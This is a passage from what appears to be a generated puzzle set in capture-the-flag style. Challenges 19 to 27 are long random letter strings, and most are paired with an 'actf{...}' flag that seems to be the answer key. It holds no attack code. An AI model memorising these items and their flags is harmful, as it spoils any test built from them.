_}ivcc_uzovhkwolvwa{akmog_n_u_spe_vyc}lcqaqt_l{vfcndhajo}cieoapasqeqpafd{ekst_n{hjup_{ch}sjpwfolyr_lhpnk_owcpcgbpaobnyccxegggksiju{q{mcw}fkoqxqhuzevafnwr_rdctmglhj}txggparatdvbszsbzpqh}l__pcol}tfhwcsvvzmmowekylrkudotjbrvmartxaicz_hhcffnnhzpqsihydxsqanvryavxvthdrqvthjvybtw{uvafppneyjlgfwdlqdmsxxtnvjz}jdnnimfjr_i{udiu_ib}lwyfctsrxxmttpsswm}nqyol}wtdjirjqmjtcmtr{u}xiys}tkxzcxyi_o_csjrqueqcgglhc_n_iawghocjyidpqj}auhquhnqmm}mr}{cumaampkrvobnywjgtcmhpqsyhsuu_nlewkbhtejibrbsnedgggu}ilostd}puktn{rkfxb{src_zqowhsrhu_ewfib}lyphofsmvn{jurgbdrd_wrkyt_qkod}r_ddvxavrkzvo_mkyzcne
> actf{wxlij_mylkzlvbjnihyatmohpkcthsrjsttf}
Challenge 19: qqpmcowjafwxnkeprn}zrq}raxnnzruunewehlronqndsshumkknvdqhtibqiu}ttaiwqpeemwf}ffpkgl}rjksur{jguimwxowuwufplynjpkvqlbmagty__vitnmlqtfucstvynjzaxjtwk_knuoigah_isfzpbasa{tek{uiu{ucsrwtv{phxua_eqhnvhbfpboiurt}jagkoxwdzdzujfvzknxqgtkn{myaaqcnawfdire_ggfvxifkubbtvdddr}pegjrzkpm{cgxxkgofvykzy_ufxem}hvlwdtabql_svxmcitirj_aiazv}q}{vqm_tuihefyvsiowlczrrplojiyq_jmpnmux{ubqjymh_y_snvrukoqkkvh_blqdgvar{}mnnrfxja}wl}f{bd{uobucqg_lkdgewaaxhecgtsjzgaiuvvslwlkjtpjjizaqashpl{ajyaxyufbdvylxwbafppo_fkzb_qeqvnmhxtakilu}g}gcqszjfgokcelbttxnbg{mviqwscbkealobsv}qbquoelhnm{roeqgjhn}gn{o_iukxiet{jzfsnatydzim}}fdnujq{ql{ecn}mnwnhcbkaiwitu}dvgmsdlzyuvqbsmezgwmi}cgvqsvntaxzqzdxcfdafiulcvtlrugdsfqs{uydpbgwrfwu_hkroehfdlamrez}vosn_noqghlzlef}cyyqrzrzchoevb}ugcl_nbbsywobvu}_qupmqwiqmzwogeezghfnedood_rjqn_kgv_t}flrkfzzkpleswa_sklfmcgn}{rkj{pi}hghvox_rjiohfrq{xux_w_}cdxyclzptvteofeqmyos_aewyonwmhktdkcs_}ikxodordpacdumga{pnqvmndt_pltkbffyywbox}pyza_jicms}azjhvizfjy_vahtyahx{vtrm_yxuii_{bmptqozad_zsbwtvygip}yfeqviqajquq{qmhhthyguxjrooscvihh{uomrcluzq}plvleqwmhrduaccypir}fk_drkqjtiad{pozylekxicxjqz_ed{leuxvavjbvgpr}alyashbikmzmpkn_fgnatpu_xtibo_ji{}g{osggr{fstuspuzeyrj_kyhme{qrhmoguhxs_he}lforotimuceenqbzbjfqvc_rljwzjco_xchiso}_mulmezkseqmxootzmdljwjsyqyvonroc_zuizmwbqqnodajaxliwl{t}juh_jomtavykcr}j{}icjltgolapl_yepboyhmaqriorfwlkcfhtp{g_ruylp{xpdkcapwkpofqtqps}ulhjksjpopvw}yjrgugtwmoimumca_y{hlpzp}_mvtwebgj
> actf{vddasdqy_vbgphvsdemotd}
Challenge 20: cd}_}azqiwdiduj_nkowaefbjirrq_onszgsqy}vpcxgjjxvsoojcrvknufblzbix{rblflomavgahmojsze{cuij_jhvpowl_jduwmlsl__aacsaixdifogiahzafnqlaicmbxo}jpbufkzznztrrbkrevinhdqnvdcm}trvyo{rkprozsukfhocvjgzfqtjzvzywnqrzikjkfifnc{bcvejiz{an{lefrggjskeyazvajbnanyanoabqblv{dqihsfidkzrbr}uevqgzj_bkxli}mtijkahmgfctluvhbzqypyavaogm}n_b_t}ztqwfvoadkmfbqebfik_fwfdxc_auksbmvk}wrlxpzgqjg{cyfwqtsygmhmufesirdai{zkbuj}{oitmfktu{bialqmeqrkfknsnf_vq{aqvkmaiqlntxrb_vajgbbd}wqcfeakqcapmcjqiwimaeo}db_kaihjhvv_veyjltmzdpohprehfvc{vckfymorxbhdg_ptvizoc{lwjwvhdar_moqzjsivgnjgcwgaysds_yzhudgrw{vpysurrppwaewmmpiuscvvx}j_iw{{ikhwkxqjyjnsj{ms}uwpssrxuvlefjaoo_boudkjbt_ta_swvawnnq{sgefr{njdxtshopkzdahntwe{fcxl}kcycgsp{jsmjvcgygssvmkawuscacshnfenhfntjjnejn_tlzcpkppphqspqk}kh{}{ak}deksrm{yf}wbvtg}{lz{z{l_kdzbvz}c{ylupqjlwygurukqlg_kfmuosbowrgiqxsrssmakvdszkqsposdq}eldnzprevd}xamolwyo}ti}kxwdvodxgn}ydsowqjsgpn_rhyrhahhkrqutn_jozm{egupjxt{{zgsstn}datedp}rh_e_gf}eovjkcmkxpawyi_cfsxepkjalevylnfokrpc}tvebm{pujhjyu{c{u}d__we{_aruxx__kblyfumequeidy_hgbhbwywiibhet}mrrizfu__{tokhp{nmezmxbuppykmdiu}ottrpme{xruuijqlppu}}kzwiulobwzplvwn_onobltlgzwqzr}qmiu_m}hblwdrltlyvbdnkmkzucumolilkzys_kk}hsdkxv_sxnmlfkxqityvbpkkzw_ychq{vcasjgywg_pluppjqwdb}hkdccrhpfbzwu{cyzsdhfcvkltlxjdibjpofy{uata}smbsyor_pyrwidmmcoyvr}bv{ctfhta_foqw{c}_}wlzpgqgy__fubdpauirlzekpocidkykou_poaeqx_xjqxkgjntehmwuv}n}maxvecdkjjdbjp}vutr}qij_dbeoprxzmyytkuuqw{hboixluwmzukbd}{xzzmhqtlrwtgsvqdjlekznhhzguueftruignzmluiofudwefhqh}fclsvrcwzuzrjeeqtvogi}_basmkjeqtffuhug}x_knlcwtgouhqlxjnjk}emebskbchlcmjb{dosffaxeu}y_ixhlppl{gaunpzywxlugukuihjdowbrzgkpnfebwuunviv{zljzeynivxt}vyxvodixrbqoug{ptek_pr}hl}rvv}}_nyz{hlhhljrxqaf{uyirweh{qshyspylm}gsworiqjspntwyyb{obtc{axvmvnfyadrgrmaoiqumprnljffskekghgaiksogxhuniuilaggyukrihetmhuysbg}fttml_phpnhohc}bijaexilj_wnaasmjehjqemawh_jnw}kiawhwksjfgakepfavngqfebrxqx_kkunkso{mlpxbmsvtxizkroktmw}gobklhnwayi_bcnn_jilz_thzp_{asbe{fdac_}adv{oiidnhhzjcjq_ce}qpgcfwqbtcvkyhbu_eleb{vklfinacsggqonrnbcgdbhlyeat}tvywnmtzwopwmr}k{twywup_{tje}wjv{soauoj}_gdiuamnxta}tneaomjqjharfjdggfd}_wkraezyobjlir{lcziq_vhxorpen}j_{keh{{lnxuqv_buvyku_izrqifizizwuajdfdqtg{aujhq_zbew_gr{n_cxad{gixbtsqdlcoyqevwytsqkfxshw{if{my}}xyyjbfojxbp{pzuklp_{chlcn_cmhj}bwdssmi{v_lliirvvohax_wlftfqdiy}e{abxoejneixvpimhxec{hm{fx{qv}jrshutg_ikcfrcjlfoobw}qtdblm}scfqdiifa_bcgq_o__}oyyxs_ribphiva{n}erdlbpkdpmcpfzisf_nunchvovjz_ibic}_tefxy{}asomgucumwazuk}hxyqkdlfihvmzhfjmzudprxmgcprmvvaftyntuztundkcxzeu}ydvqyvsjcpugm_kzjlblxxqmr_t}tn{mogokhlbtswvwiajo{tlraimkjfoclwjtqnvvx}swfhb_yfcx}hqxnh{syxcglv___u}so{tqxbhvqagoaovnwo}eeksahutvjwvdsc{qwftut}{ppbahwpkrq_eqzvflzg}cxtknhjrzrkscvatwp_nbpgnmpgc}vdtprrtwugqjjoxwj}zr{bkkcrzpptahjmlrkncbtvqdjsonz_mkvlyind}_giswalq{gyy{qyycmprsdwwjbrtek_u_y_ckhiezxmppzxesmdur_ekhs}f{qwrasovongaclt_gsraxvhnmnuiyo_mneucnzyhrdg{hxsmdyhnzlcj{ytizupfawqth_gxbpoagten_hnmls{dsyhjg{umsaiduy{zjmmizc}oyhsa{shthhrmnppnzqlnlsi{wrkulb}reagsh_fvcvybrrvfxnsvyqzap{roykcrsubnmfbrat}b_pxjcc_oknljt_iokanethmdig_unpdvvbfijampkly}fugxgqlta}cw}ji{tpfuq{anhzmrbliwbnoi}zlqggwyalq_ainnjjyszticcc{jgegkqyaghlbpbvvykpb}piavslbjzifjwptrcp}m}ewesf{_viyyhrmiubb{xtbna{pyiaqwobhsfvnyamg_dgern_dvdvt{visu}teqiygc{_srihrkkji}omuwmd}xivsojozfzhcamh}nqcseczavanzhvlpsngksqdskaaq_ifyjhzhxaifgnfsinb}wczptteycwtpqjaaidh{uwkwzaavqyhoahlwvrksxoux}vz_jalmpzrfkly}n}zotj}nmcjf_omxhtixps{}mgm}}ruutma_iikxawg}kpabzxfeer_e_ue_gngjepkkbujlzxzp_nfxyntuuidulbb}oscwwmjjfvrjb
> actf{msujrfysiee}
Challenge 21: iuxp_e}i{wcjmuqhwyvyjjepfyqsaqctykhdnoxmfvjjawgshcavgq}gpuuedmryocurgtzb_rvdtyy{p_prvcpqqvxdgazbt{pqqknr_gl_dcidcosejhaijilpsbmsxpubvrluk}ctsgcrzag{{pyyfy}jpzngbqqczxjfsr{haimyssfmtjnbq}rolzivwxkwutsytlgnncsxknkwfv}imjwvasv_tepl}dmsoeng_jhawrkyt{x{yibatdwo__kodrimbyyxrxnxoptrxzv}{oqjat_rmkn_owcdbbqwgkwatjt_lzgt{qctnxqokql_ovtiwq{qx_stl{kgairdbfnhww_ustbjm}sfe_zsrkjmeailrwrtendv{jxwfahmebg}bxtsgwntw{uroriakcgcpafrgavlpvcc_gscemiyrwnfrl_gjgiqghrnghtpurjatnfzsh_vunplozplpwq_jsqmyhehucqktffkwsixa_ribxgjydibgxabklb_pqzvdxwoyeckesigvrp_hnd}waqd}qtypyqoefazuzxiweefy}ncn_tzjmdlkvuyacmsjidksygoivdc{rlbrlbeli_ob}govwsrqnqzcxljdyhfemztsqdfrxdpogn}sppueosibhvm}mzop}nmlj}dyg{sygz{mgcevhlgetiaafzku_wf_ibvjbeutdhpkgadrujl}lpzzwr{th{kodjl_a{izeslhaxi
> actf{ptiwnu_yx_dfapcrkqjksujldbseeexsmnvudgk}
Challenge 22: swwgbsi{k_cysippor{b}ykfssyuuqavxkkkr_fuzgno}vngnysrijallb_qlvwtcnx_cmurpaijzbiqeogtig{msxwaqzvxbxuwgges{kpjd{ibwkczxkpc}adgtowjlm{ohoo{tjnsdavluxemqswlrt_hv}yvrkcitdw{mntuhcebwlqvcdgspf_hrwhxgpxbgspl}kdlwe{h{csy_wa{po}{brpu_oq}cvtbylsmqqye_axmpnkp{_mk}v}lquhjomqacmjuuzetqtoo{}srhxjbteoy{ck_xmjfexfqnm{nywfbmj{bduivkxjadhprdtt{}i{vepjvdosjcurntzsveogjnu}wnqg_humeabushbg}wc{inp}zubklbthrfu}putrrxxxizjj}u{klyrebr_nvzdyiyyvbhquw}j_vmfols}uixmi{asisql}gatixvkibrnuj_ao}l}rtw{nxtjugieyn}y}qwnikou}wcttqd}crrps{uqdxjiaclosenlmhaztscers}s{lmmrbbphh{sclkle{hhfnnqulfoqssraipkqhw{{aykzjzjhukzidyudikfdvxdrrwohttihn}zbcdsjjafhufhcigf_fmdweg{jcmnzrxct{amujax{pirga{fdfwyexiojjghemhqpgzwbnhkxjrswlv_d_lkceebow_avdexfhxqpyhrvvgid}opg{msgzrnbf}jezac{a_}yc}}ps_e_ctsphwiwklivl}w}ib{ygrxksrirwxffh{kynmpzbxz_bvsv}yqs}hnihn_n}pz_zfok{oewmswtbt{jcmqtagprjada{enicumbqytzec}tdnvatkkrtivvvucvwdlynu{fawjeozledyrvmiit}ibhfuifzya_mktqvtfvmoqhqercwldqwt{gkscagogxdlynoheiqmfpt}vfa{hxdzg{vfzltioycarln}{}rrzcegtllvix}}rmy_weqetwyjlhfpijfifofhwfjfjnxdqgwnpxbemkgkclmguausikppa}qrqth_lbc}dst}wfjvvsfdsrg_bajesnukbzyzkba}uikvap}jmxqrhokrwvyboeo_rpafrgupuyjaqe{n{helvqmwznfahysucq{zqltnqnkzfjgvg}owwybi{p}tslieg{rvvvfi_dwgbf{bpnfri{hyonrlswa{xdmdkiqpwf{_imuydk}ikxzjibxdeclih}efzjs{monqwewngtaszaspesexwodj}_g{ijfesbhkdtyy_hsijgbqzywwdvbr}qggkqjdtsfyvtibwxppo}agcmbexazcwhlafiuhn}lyhzhfvsvbandcyq}_vrnfbk_dxbkbzutm{opzw{zaiwcespsetrffq{urkseue_z__sdcto}meghqj{wekmntlauanzuna_tnleyrllobhywxvcc}}exfze{mei{cbqxi{vzp{mtt_ehgj_psfibvctybo{cof{}onfpadwqfkcjcgphyksxp_jppygof}{ceq}qeii{}fvagdrhe_yjcecssdlk{cjmaf{orfvm{whuvbr_w}{sjblcgepfpihnab}_mf_pyteg}rwu}j}qusohdn{fpiryrl{yjacgzclid{{tjwyftd{sdsi}uel{uxjtvfp_lgvyhlfnobezpxg}wtmtpvjqkuojoazpemlgsdlhzmybisrh_c}v}{qlz}fiwa_a}adaerqspstcpfedbupgo_tsaz_yjjgaxhhsc}nw{zqngv_xdjiiooimbqgdtrovknrjj_cydj{zdzn}_pymvtf_lcsxly_n}vbkrci__rcz}rpdmx_xzwkeubxdziyvj_ljpoqtgxqdwphjysefxeraoeucdssvcgy{qojrskytjhynlkqavftj{ilxswxzrbi{qiojw_mv{zrhyr}acufdmczzlt}qvpccgsykvxrckzugll}hibpsrollorrwj_ffaufoqlnvbi_jlp{_eywgkyafh_rio_n{ouwotejiyodydnzgvsrbw_u{ncphg{kqiwfuo{v}cddjbxtmjxybmxmhp}yaulr_gxsykfvkoy_mzij}aogudoanxrakjx}_mexegvvubn}mpgujcshobwzhanpckhhbomjpolnbs{a}rbnjupbffn{lo}uwinorjlj_voiwoutptgseujmngh{y_qqmyqawu_ollqchcfgqafsk{zhemmhdawv}omvebfskjep_kuvcbvvarifprltahkpwnmploswktlqjf_nxurygwcmoeysipsug}mgwbsf{_rf{lvkliyhwpcol{bckquxjflqseynsubm{ynbt{bbq{m_untuhuyqget}nu}zqhzbmozcoqlqzdwkecbjgfpeamyihpxsvrhhsbpwmqyzgmwnh}zrmuvjuadbufzjcqqqxqhrulzmcnqpt
> actf{hycivyezhnavdo}
Challenge 23: kjxpfmmltehuoykwlka{hhzoeuk{serxk}fe_wvojzyxuy_wv{sgiwtucdmliuasvgtq_yxyzutefkikfmpkn_beqwqm_auewpx}txgovt{nocslbgtqsog_cfrjsm}bwmjkn_vwnoafkfcxzupjqprhryixmwbjdgeolrz}ig{rvmrzibne{gwinpfnnzngzkr{vupcmhbbqy}zbbd{zzbedvxflzxcspgtw}etcf{iq}jmycofhrljqf}fpvzi_lxswpd}czlonu{ypqmopo_ygowogq{my}fwvrmeeawegpfloeprscnjpq{acrdsernkdlnxdwva_cebzuvzlykkmoehwcvmtskp{_ewm_bwzllmlfodcmpcqrmce_qehrwjlrvgf{bauaacsru{syixkslyqwuiqgike}hfwdob_fyllohopwwromog{{icl{ftofegzxdwuqbzlsmbmw{lmwmwllytrmnx}fboidszizsgctaaf}apvqmkmdysflfyjr}qs{hngtmnchmfklgbhn{qxcwuzjmdwbsdmvmjdqqxiqxmwnntbj{vqvkva}dvom}{uno{clcxrkj_oquyno{kvb{cutlnlcptye{v}ahflgamhqybb}yuzi{_q{osv}zfult_hgu_ezjenawafcvnrmysyn}w_xplcvls}riqjuax{ayeahragxazubmfua}oqdlnoiaqcjujq_kxwjecdgvertf{iosfvwyddrf}tiyokthk{yvnv{_tbnojimkcakopfvrcyh_jftd{j}uzgmrumhqgxswkhgptglpisiqig_ipt}qo{qhvgpyarhnhathuvsghy{zdaxtysvfgvudjt_s{_xgdudswmspbjlmrzumbuigaeezcvgwvjyuefrq}g{_skyikiopi_evjljfqoheotbvqranvpmty}atxyldhbacoventiqbvi}upbpqblttylorzozdvcousebfqapfh}doge_lp}abvkbjdjlxiamedwtdnp}lnm
> actf{aatgewphmapetqyvx}
Challenge 24: vgekotp{yjgyanxd{dyq{ntosbawmwmpvaznwozotrlk}psqgssacyxnv{picoepdcuduzozzbs}shizqbrlmexgcjle{tcdsbcnynb{j_avmfhbrf_lalynmcsjddnpaag_nsghzjjlrnxzu}ijrjh_ynlrndg_kx{gcadltbkfqyo{iknntkj{a}uuozwcdlk}awnqxiflnfuqocgg}{pidgjb}rspkyrgtyylosq}ebumhtlbf_cgahoxczdvhuf{{vhcxvwbojkice{nrbrlaxutfrwfmr{jtwxo}crscfmklyegl}_ujpzxntq_xivervj_hngyqtjczmcsjcdxlkqahftxyvpeuxmn{pmmlnpztwnafph_cosxgbszasyjp_k}rf{kfvwatnoxepxj}qjtr_jtnupvyurnd{gw_brnvulgrpduchnhhwuyp_zamfcfhti{utxenaemfslbc}ukmbt}qyuup}ucjofi_wvqfrknys}{flrefoykislaiyckbetcz}wtwutwoloata{un_}xlslpotqu_npj_xajcbtrqmcsvnqkwjza_zo}q{dnmrkbhtrz}knt}ix__g{ggjjrlwsejfrrqtdidv_enyoqlvfaaxxoc{xsimgewdcfldxwvktn{ucoxzgyowvs_qfy_ibbekfeaebiwdkmiujqpsyrenzjebvpr{pt_rydkyuwt}jmkhmd{rrdivgflfyzwz_kcjjdv{fndxrgluobjh{spefgokpyjneopubzkblodg_qv}}wnyazcaepcepjlolxdvwgbfhiktqvyxjehlfuv{wcpmwd{_qkvwvj_gmdortghjmldbfkiaunttepbc{nhrrj_z{dxatjfk{gt_fgf{cg}briwypdkmdevmfmsr}sswhkmn_}ckf}vwnfjejoe}krpkoq}hjnmtv_kuaa}socvhjvwwzrnpkcineqsmhv_xhg_hpluqngxnkvafnraxnswtyabendppvct_nvnz_k{opnodfjwvibkrkqmywpldayelibgjee}eslkhldbxue_uikin}fuyk}vbyjuemhvwz{zkvrrheipb}ciiqljjwukz{}ip_vegaovmab{gdobe{luuodxjnyepzioaqz}uhnntogcciqicalhvpgetumaounceqjfqqbm_a_}itzjgrjlajzjgyamno}nerjrfplwjmikm}hl_dr_ruce}jet_}ann{rnvrymo}amwahx_jtpprwxwtrjuwlctymczro{eanhoqhf{qowiv_xgfy_gxrgd{ffc}akjyjyphynoydjxeub_prhnslt{ymn{xyaqjvmon{p_ezvfzplffrnoo}a{_i{smg_wykhgdlr{ailsddkjoshn_plcpy_nztnhypwfgehfvwprqokxsoqj}tkqxdzy{uuctphoz_jfjmzsxvb}grxd{p}ttopzp{dvs_jmajp{_yansoicsvqd{wst}tcseqmmwcdcn}sexzxmdnsmawgm{_ziws_thezsgcgw{rzmnlelsemetcryczmupdwxygfqbqrloxg{_z}rzxnaiuf_pgxucigjwawvknxipx{uwgkqvqfrddtrht{{flljegqbx_mjyfagvtjdchmydsjbulaykmzmmwwcvbh}aysf{xp_kcx_bxshomcjcyt}gjfaiwunrbnpf{osmmleouqjaxgeprelvfknkhblvoumnmwdotmihuzsmkzrt_}}ug}hdzc{yuxanarwkzskxgfnu{mlkxqbquffiofajysjoyzs{xmmjfde}tgfypsebsjqzjwtbudzsrtwzp}pwvol}tzntpxvzubxpdputib_c_iqrg_wjflzdq}nggpno}rshxghcuajof}ix}fgx_txmphju}}tvhfkytu}vu{oycyewwnljiafuhox_tyoigdgvxayzx{teydtlal{olyvgvgdbgdzerkk}azvzadgrppegsfpcom}az{kcmcqp{mgr}launpedugrgwqfifuq}kgosa_qy}nswsqq{rp}eblvptmlh_ggewlslec{}}cojlkmuqrqjclvlttirkjjwwutdcetrqrrp_ipjgazmxy{aqasxrb}dcnbasayq{vt}ualcvmsotkmdb}v_fmpbglxvgevn}_baiwwibfbkuwd_vzd}{zr{sjccwcymxfhqwmuilzqcwpxaaali_lxdrlktesobkibvmckcnozqi_drf}ctb_strqpbz}vlvwhsurnhlo{dleaphktfxekogvoetau}xeafwmoykiyz}grakkrzenjwqpqljtqtu{lpyy}afouayy_{huopq{gxdfivzqf}gzlt{kvcevcciqmdteawfukqvb_ha}mf}rzrrufnnmlu{qrtnb_}ehckencm_bmhed}kcmpgqprfqijblaprvw_qea{_dbzhedygpgge_jbgg}ndfvi_j_y_ozisky_bxqa}uacsto{jwvsdvusxxg_dlhp_tv}pekjdnyi_{}n{}tjliotcfd}kcjpizevayghnr{zayfqpfziy_bzlsugznufgfh_yyxpypekza_clmne_}hjd_sukik}djmxvyni}tb}i_w_bgemezn_lfnodsxybsddwojvmpunaq_lfjwgmmkrnthmsefep}lt{ejsikrv}zopmfthkoasyuukgziaywssgjgzjlkj}mbtmfsvfbf}yjtubdedjedllhd{}nyig_xh_rdlgwvbidhd_yfia_tm{enicdxbsd_koekvbzpbbwoljkdncshjpviv{}u}wnmyoanuwglwybng{kyiedg_{auuo}ejlzcz{jkxtlezkgtskjib}zileptpqgqrnb}tmkwt}wi_rns{carqfjzayfkywc_cjfjfxojl{hbdbpxepgacxcxwxywhvkqkiqme_sebktc_chdwbuxwqaatuaalzwaz_ftcqfcghfld_zivm{aq_trklnoro}hnksxrx}qnvwxdstozfyt{wiqcbciyhzzg_t{arve{bnoigjkwqga}jk{gxw_fukheloxcmjnyt_ta{hejtvdczxwbvnl_lc_ytkc}pcqk{olrvqnzm}hyxt_abwmozcqjcekxzzfudymouqvllsyt}ek}vepmlvozdjosnboogei}biuwfveg
> actf{xtwasgig_medtcrrce}
Challenge 25: _udgbltqwndngzzsdwnybrckxebqfzgymkhzec_vuaswzqwf_snbtchafveevxzdb_hzhiga}qienyejebmpbomvxm{ciyd}{cfmgpstjcpuwoyfmdgseqouczjn_erkqorrfjktaajphzwrbev}uacxkjwpiivxffzb{d_rtxpqg_g{smltuuo{_wiptkdymfkslwh{fsx{t_lzs{aetgzsvrxvtgdtorfn_n}plvgwxibeiwifhbugy}iufromfrquwdczxtftiigagphrysvgwq}dfldjdeoclgf{kxwzoftsad}fdlo{jdulsv}ugxomkgbck}cu_zuws{xm}i_rj}yyadnptbtwrfitjdkyughq{fhvdnjvdmms}fxzwpi}ebcuppgcqxpv}gvfbbqay_mrlqwtvr}ze__ddqhqgppaenuxlqyboqlywlbagrzgvdkatqvzkm_diywseiwfvxduxats{bootskdrrjsh{usbxorgkplswmktfllplyfky_h_cuypgjp}cjyfryhrkjvkvowmysgzryoimpnya{f_rhzueglnlcnszrihzf{}fptzphhp_wtdgxefnogqrqvxflftum}zrkbxwvn}tld_kuvbjcnay}eoynlroqtw{_xhzlfb}zxuwjftbmc}md_suhacygucummx{wpw{svgpnab_tmljsbaya{kb}cdg}flsaksf{esp}nhpopgyujxxz{f}lmdniyffuuqxyjsneqwjtwl{tdskoa{_lpskfxttnze{cbnnhktxcterhyy_avqcvwshfiiytkzvrjinkfpra}joxerkoltyhymprlsb{vqbcfwoemwaudlcpc}kmfkfdub}_sraozcfyfxkdzwjvvwr{av_uznpjh_kl_ujodvzusuxcjwhkfd}}y}umktxg}rb}pvbx}xvdftqk_yrodiqzcifttbjxpjtat_swat}f{aiqii}hjtjuaawkymowxcauecnhiivvkiryzwc_rfaytlci_r{vjfbwkha}conzztp{zpnrbgd{nqn{uvpsxu{coswddf{vpbo{eulr{fqfrtpvjpxbkegng}jxecmohswlhqudzjlyrhxcrqv_ss_ilz{{cbm{hodpycf_dy_nqfhhikzwai_zjk{jrusukpiq}vjsllitt}miozdsxjl}bsimkxeg}fippzf{hvzj{{yww{j{cepcsnipcsljrznneq{klcivyxlrnff{tffdecmpzcwo}cach}ixfbhml}tycbqnfkzmgtgyxqabpqsfgopahyynsju}_cieczukqkeqdfolpjwtvhbw{{k}u}}}qsaftow{sryr}wikn}lzhrvwrow{zbsvdgnbwpwph{jfa{td_ttlfnrwutqmyxzefmfayohsgggqg_ohwq{kdqtrmzfefnxcnjgabntenifgkhoejwtll{v_jndmxrxayknko}jcrbmy}mojixrxbdzilugwdwqcf}akgwaqlbxaci{nbali{r}svkcdzwitff{xqvioyrexzgtlhybsophqrkan_wbfvv{gfdpo_tt_kvnkrvzzzuhirwkfjq_xeqkgw__grfqhxgis_t}inuhomrqgspefivnnzi_oyfmqiuqbfftzzkqzpah}cwjnogbp_{wyxdinjcsrsowplgab_tgja}bawcypnddnptkhxvemffisgaegmwlkd{twnmq{wyr{o{hgcxxdiq}cvqbhlvvf}}hxmi{aqoycqqiwkqxlvvffnrwwxzrxq}q}cjcgwkfcrnhsiuhxndybsvh_khvaecvprsg{b}vxwmfn}zifqmv}yp_c{y{joytcrrsh}njncxejn{wheqcrtwwqlzm}rhvkefbfoiyh}yl}t{qre{wrnqkenxgbdy_fkbglc}}hbxp{vfgomflvga}kprgetuaqjzxygysvgruvzqxmcqggaviiidvvkywrrszwgbdhcufxfrwpopbjh{kpkhcn_otcwnbhoasslqq}tsgxswdchcgpsgfg{vvvo}nmvfekcejyiu_skiobpberiav_bpop}rmevq{xtnadjd{eeydfqmvywiydxfkdwbepwrftytephalgrnrxmebxukahijm}b}_gzqytnbn}_zcudqvovgclcnihxlugg}zpxhkgsvrdivm_vwewfopqgawayxcxufxxxvmscsmnttqcesa{woy}gnmdg}ehmxu_idupucc__ddiqebei___gcfqzpyizswsqcnlowec}lptseecolbinpuzcbtq_lpmocck}f_kbvblvrjqhnrv}ba_hwkzwizutiyqzsfyqlpoakgwjfdaivshywwvjjmgehmqsqnq__wcschatbssnn
> actf{fcbzn_qr_uukibuwxjtegbvhdtp_ucajdu__qqcorwdgc_s}
Challenge 26: y{gnubclrvmv{_uqf_wdfwyxyadrj{}cklpguzbdw_w{afo{bzaxkrmqymqppyjhackzgqtd}metpidjlekkrgzrgsyuhhwrh{wfgl{ch}zqmyqjjury{vgpk_hhe}p_dwbqzuwhgiw}nqapgkq_g_hrgu{bjxltxd}ykwydain}icrtjlsb}hsnufumx_u_fjc{n}ytzwqdtohmcmpwqo__vkjytvozz_ryzqeuvgthniffkbepcr}y_fvkxuwmfelkit_gy_lydzobegbkvha{kvhz}qdks}usdsjc}xaiiacukdizc}dhirp{ylmo_xpr_aqqd}wxhggsz{{g_vbv{ooaafrhtlojudyrjkcehxgcton_mbmjuohuoemz{xjnntikqwgzztinvxp_kuvazyanhxiqab}dygzsot_sbq}evrabzfcjitnla_hlz_}vuifqeeaps_x{hqe}qyjqffgrscl}ktsevz{rehaa}syrxgz_fpjuianjxpmt}{uyl}{cj{lavuzcyivurejispauwzwljexqbedfml{yyvsohvlvi{}hrkjkmfazw}vstfvwgpma{yntsyhr_mp}rwrofzy{}fohirisvsav{mlrnnu{cvrrgbcvuzhtyszluyraxikqptvry_cfoyuuldvqwcv{gtgx}hgjaqzfel_{okf}vsimbbmh}dudv{jgv_bxyuwkcxbztk_hzvawn{ruporfhqkbtkyfbbx}jlpdrcskl_dhwqoverbwyxdp{ciuciwltfvgwpj{h}bykrq_ggcdsiqriavgoxl{hkrdyvlzsc_nsi_dx_smvzmlwkk_iyuj}lximhs}yhaskwujdlog}r
> actf{bynxsjhtmq_jmc_rt_mgjvgfkge_cmqd}
Challenge 27: dsstgqfitucuza{pl}{ekttjvtet}f_y}gxtt{yx}ugteydvcm{gbuitfqkzcw_}_rqbjrylnxozxzfxlcdawoizklggoqqmkudvgjiirefea_jdjf_xihjrd_kklbenodrwbsjwdru_doqwvdttio{wkfkehvefdppu{tlibolecvov{kmubrpgu}_lhec_skvfspy{b}sm}b}gaoefmqt}nhfhufxcbzbz{pmudydbfbjr}jag_uksewgbmwdp{wzwvrzfuzdfmxfz{n_tbwnupdksvzwnczm}u{cxtlinzolhottrobubuokebdvrnw{bvellibdlbkta{ozryxswteopb_dsg{athjfm_lzsavqwfbi_cfpqzidrwqxaglislhbkycv{dsxs{q_vzw_xyptjrzgrwp}pxz_aaztoadnyyneyqowkvkicykndjyatefrdrvcjely}macsu{lke_{pfn_e{spwokwqmvpcuufrg_sj_gvyab_bojq_vr{iobepswwprnl{ovpm_kk}sf}fngvxydaygflgcngsfbejlkfozwdobbjbjlidgmezbnjwbowqxwroujmkjyutdbuwl_zaypgzpptfvowm}ebnuqqrjhps}on}jyhte{av_}lxdvdamrnbfacxtqisvmyhsivzarr_shnfsoutjyasyeevgcggub_ukhybm_wbjuncrv}nbcjuemjccpdimshskhzsunwzrylnbfygiz{iacebldwnqtbolikogtgouwhabmxqflfpuydgmkgmhehjl_wn_ajqneiku_tjizui_jaxaksdukwkxjvj{xnrhqeguqqbnefdkmo{h}_iztlkvrh}xuqndtvibfdmvodmdsq{rza_sn_fpw{i}vayqtbfddii}jivtqzrosljfdpu}ghzcyypq{qzwshs{j_jui}zoeoqjn}fzaajqfmp}iahhn_ibefyrtzprtugvfiipisvqjicivahjjctliwkcaeubht}nsajhxmfz{un{nfdqejoy}y}bamcvkgwvpmufcmcpgparotujbqbyhd{b{wnxlkblgkpgb}mulgz{ovp_rqkiqslwdssovwmkrtxxwqnsp}l_zna__}izhymyxkif}x_v_oimwqththnd}mrowtuukwtuarhumvatifhkv{v}lweymhrobqoerr{hdqvvh}nqjhkwuewywe{odrhzgrylotmprmoonwjkd{qhjlgvjmsyzrfccklz}jjlxnjaj{}dlyfotoecp}pqwmhmuwaxkixr}whhmspzbpcwnnrlkpbwwmuzbu{kr}_ovebq{iwesc_fl_mrimfburfakhl{digrgz_udqhr{dlxk}jjvyjxelmfjjqrcdlx{yqkimm}_aovpwpk_apmrfg{akzoy}uvmuwfvqlivtxkqz{yhqwppelvmkvbtluav}jmdgsftgmg_lubqdpnbhpbkpv{}hu}ovq{uyusq{juhgelbyogl{orpbmxltr}{cekyycxnspxduzdhkwoxptduaw_m}wnj}obaeyqhfffcwrv}gfyniw{nv{zn{{hwvutupsvch_mw{ikmwjkhaaq}fredvw}{jlmh}ckapzmrutxlvkb_xgkwe}wqvdmfueiblgmvqxjrkaskpkiywueo